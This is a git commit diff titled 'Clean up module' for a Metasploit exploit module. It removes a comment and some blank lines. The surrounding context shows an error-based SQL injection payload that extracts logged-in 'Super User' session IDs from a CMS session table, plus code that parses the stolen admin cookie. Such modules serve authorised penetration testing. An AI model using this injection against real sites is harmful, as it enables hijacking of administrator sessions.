Clean up module
parent
4354b5d5d6
commit
310332b521
|
@ -80,8 +80,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
|
||||
# This way we make sure that's excluded and we only get real admin sessions.
|
||||
|
||||
# The modified query should resolve previous issues - Michael Maturi
|
||||
|
||||
sql = " (select col.a from (select count(*), concat(0x3a, 0x3a, (select substr(session_id,1,100) from #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL limit 0,1), 0x3a, 0x3a, floor(rand()*2)) a from information_schema.columns i1 group by a) col),'A' union select uc.id "
|
||||
|
||||
# Retrieve cookies
|
||||
|
@ -121,10 +119,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
if res && res.code == 500 && res.body =~ /::([A-Za-z0-9]*)::/
|
||||
auth_cookie_part = $1
|
||||
print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
|
||||
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!")
|
||||
|
||||
end
|
||||
|
||||
# Retrieve cookies
|
||||
|
|
Loading…
Reference in New Issue